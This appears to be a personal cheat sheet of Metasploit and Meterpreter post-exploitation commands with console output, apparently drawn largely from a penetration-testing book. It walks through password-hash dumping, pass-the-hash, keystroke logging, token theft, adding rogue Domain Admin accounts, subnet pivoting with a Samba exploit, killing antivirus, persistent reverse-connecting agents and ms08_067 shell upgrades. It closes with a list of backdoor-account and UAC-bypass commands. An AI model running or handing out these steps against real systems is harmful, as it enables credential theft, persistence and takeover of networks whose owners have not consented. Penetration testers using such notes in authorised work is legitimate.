Table of Contents

• Extracting the Password Hashes
• Pass the Hash
• Capturing Key Strokes
• Token Impersonation
• Pivoting Through Sub-network
• Meterpreter Scripts
  • Migrating to a Process
  • Killing Antivirus Software
  • Obtaining System Password Hashes
  • Viewing All Traffic on a Target Machine
  • Scraping a System
  • Using Persistence
• Leveraging Post Exploitation Modules
• Upgrading Your Command Shell to Meterpreter
• Manipulating Windows APIs with the Railgun Add-On
• Other Useful Commands

Extracting the Password Hashes

Running as SYSTEM.

meterpreter > use priv
Loading extension priv...success.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29:::

aad3b means it is a standard placeholder bacause the user password is longer than 14 characters, so LM is not able to store the hash of the password.

Pass the Hash

Got user hash, smb service is on, and the user should have writable permission on at least one smb share foler.

msf> use windows/smb/psexec X
msf exploit(psexec)> set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec)> set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(psexec)> set LPORT 443
LPORT => 443
msf exploit(psexec)> set RHOST 192.168.33.130
RHOST => 192.168.33.130
. . . SNIP . . .
msf exploit(psexec)> set SMBPass
aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29 Y
SMBPass => aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29
msf exploit(psexec)> exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...

Capturing Key Strokes

meterpreter > ps X
Process list
============
 PID Name Arch Session User Path
 --- ---- ---- ------- ---- ----
 0 [System Process]
 4 System x86 0 NT AUTHORITY\SYSTEM
 1476 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\
system32\spoolsv.exe
 1668 explorer.exe Y x86 0 IHAZSECURITY\Administrator C:\WINDOWS\
Explorer.EXE
. . . SNIP . . .
meterpreter > migrate 1668 Z
[*] Migrating to 1668...
[*] Migration completed successfully.
meterpreter > run post/windows/capture/keylog_recorder [
[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/loot/
20110324171334_default_192.168.1.195_host.windows.key_179703.txt
[*] Recording keystrokes...
[*] Saving last few keystrokes...

Token Impersonation

meterpreter > ps
Process list
============
 PID Name Arch Session User Path
 --- ---- ---- ------- ---- ----
 0 [System Process]
 4 System x86 0 NT AUTHORITY\SYSTEM
380 cmd.exe x86 0 XSNEAKS.IN\ihazdomainadminY \System\
Root\System32\cmd.exe
meterpreter > steal_token 380
Stolen token with username: SNEAKS.IN\ihazdomainadmin
meterpreter >

# or
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
 Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
SNEAKS.IN\ihazdomainadmin X
IHAZSECURITY\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > impersonate_token SNEAKS.IN\\ihazdomainadmin X
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\ihazdomainadmin
meterpreter > add_user omgcompromised p@55w0rd! -h 192.168.33.50 Y
[*] Attempting to add user omgcompromised to host 192.168.33.50
[+] Successfully added user
meterpreter > add_group_user "Domain Admins" omgcompromised -h 192.168.33.50 Z
[*] Attempting to add user omgcompromised to group Domain Admins on domain controller
192.168.33.50
[+] Successfully added user to group

Pivoting Through Sub-network

# first use the scanner/portscan/tcp scanner to conduct a series of port scans through your compromised target
meterpreter > use scanner/portscan/tcp scanner

# add route to the subnet
meterpreter > run get_local_subnets
Local subnet: 192.168.33.0/255.255.255.0
meterpreter > background Y
msf exploit(handler) > route add 192.168.33.0 255.255.255.0 1 Z
msf exploit(handler) > route print
Active Routing Table
====================
 Subnet Netmask Gateway
 ------ ------- -------
 192.168.33.0 255.255.255.0 Session 1

# exploit the target in the subnet
use msf exploit(handler) > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(lsa_transnames_heap) > set LHOST 10.10.1.129
LHOST => 10.10.1.129
msf exploit(lsa_transnames_heap) > set LPORT 8080
LPORT => 8080
msf exploit(lsa_transnames_heap) > set RHOST 192.168.33.132
RHOST => 192.168.33.132
msf exploit(lsa_transnames_heap) > ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:47:e6:79
 inet addr:10.10.1.129 Bcast:10.10.1.255 Mask:255.255.255.0
 inet6 addr: fe80::20c:29ff:fe47:e679/64 Scope:Link
 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
 RX packets:23656 errors:0 dropped:0 overruns:0 frame:0
 TX packets:32321 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:4272582 (4.2 MB) TX bytes:17849775 (17.8 MB)
 Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
 inet addr:127.0.0.1 Mask:255.0.0.0
 inet6 addr: ::1/128 Scope:Host
 UP LOOPBACK RUNNING MTU:16436 Metric:1
 RX packets:600 errors:0 dropped:0 overruns:0 frame:0
 TX packets:600 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:0
 RX bytes:41386 (41.3 KB) TX bytes:41386 (41.3 KB)
msf exploit(lsa_transnames_heap) > exploit
[*] Started reverse handler on 10.10.1.129:8080
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe411...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe412...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (10.10.1.129:8080 -> 192.168.33.132:1608)

# or aoto_add_route
msf exploit(ms08_067_netapi) > load auto_add_route (run autoroute -s <cidr>)
[*] Successfully loaded plugin: auto_add_route

# check result
msf exploit(ms08_067_netapi) > run autoroute -p to check the result

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.10.1.129:443
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (10.10.1.129:443 -> 192.168.33.130:1090)
[*] AutoAddRoute: Routing new subnet 192.168.33.0/255.255.255.0 through session 1

Meterpreter Scripts

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.33.129 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 37888 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\CTDWtQC.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.33.129:4545...
[*] VNC Server session 2 opened (192.168.33.129:4545 -> 192.168.33.130:1091)

meterpreter > run screen_unlock
[*] OS 'Windows XP (Build 2600, Service Pack 2).' found in known targets
[*] patching...
[*] done!

Migrating to a Process

meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: revterp.exe (2436)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)

Killing Antivirus Software

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
[*] Killing off cmd.exe...

Obtaining System Password Hashes

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY de4b35306c5f595438a2f78f768772d2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::

Viewing All Traffic on a Target Machine

meterpreter > run packetrecorder -i 1
[*] Starting Packet capture on interface 1
[*] Packet capture started

Scraping a System

meterpreter > run scraper
[*] New session on 192.168.33.130:1095...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\WINDOWS\TEMP\XklepHOU.reg)

Using Persistence

Meterpreter’s persistence script allows you to inject a Meterpreter agent to ensure that Meterpreter is running even after the target system reboots. If this is a reverse connection, you can set intervals for the target to connect back to the attacker machine. If it’s a bind, you can have it attempt to bind on an interface at a given time.

As of this writing, the only way to remove the Meterpreter agent is to delete the registry entry in HKLM\Software\Microsoft\Windows\CurrentVersion\ Run\ and remove the VBScript located in C:\WINDOWS\TEMP. Be sure to document the registry keys and locations (such as HKLM\Software\Microsoft\ Windows\CurrentVersion\Run\xEYnaHedooc) to remove them manually. Generally, you can do this through Meterpreter or drop to a shell and remove it that way. If you feel more comfortable using a GUI, you can use run vnc and remove the script with regedit. (Note that the registry keys will change each time, so make sure that you document where Metasploit adds the registry keys.)

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.33.129
[*] Creating a persistent agent: LHOST=192.168.33.129 LPORT=443 (interval=50 onboot=true)
[*] Persistent agent script is 316384 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\asSnqrlUDRwO.vbs
[*] Agent executed with PID 3160
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
xEYnaHedooc

msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.33.129:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 2 opened (192.168.33.129:443 -> 192.168.33.130:1120)

Leveraging Post Exploitation Modules

meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY de4b35306c5f595438a2f78f768772d2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Upgrading Your Command Shell to Meterpreter

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > setg LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(ms08_067_netapi) > setg LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > exploit -z
[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1032)
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -u 1
[*] Started reverse handler on 192.168.33.129:8080
[*] Starting the payload handler...
[*] Command Stager progress - 3.16% done (1694/53587 bytes)
[*] Command Stager progress - 6.32% done (3388/53587 bytes)
. . . SNIP . . .
[*] Command Stager progress - 97.99% done (52510/53587 bytes)
[*] Sending stage (748032 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.33.129:8080 ->
192.168.33.130:1044)
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >

Manipulating Windows APIs with the Railgun Add-On

You can interface with the Windows native API directly through a Metasploit add-on called Railgun, which was written by Patrick HVE. By adding Railgun to the Metasploit Framework, you can natively call Windows APIs through Meterpreter, all through the Windows API. For example, in the following listing, we’ll drop into an interactive Ruby shell (irb), available through Meterpreter. The irb shell allows us to interact directly with Meterpreter through Ruby-based syntax. We call Railgun in this example and create a simple pop-up box saying “hello world”.

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")

Other Useful Commands

ps

migrate

getsystem

run bypassuac

load kiwi

kerberos|wdigest

net group “Domain Admins”/domain (list all Domain Admins on servers)

qwinsta (list about user session information)

# Create an Additional Administrative Accounts on All Hosts
net user username password/ADD/DOMAIN

net group “Domain Admins” username/ADD/DOMAIN

net localgroup Administrators username/ADD

screenshot

sysinfo

rev2self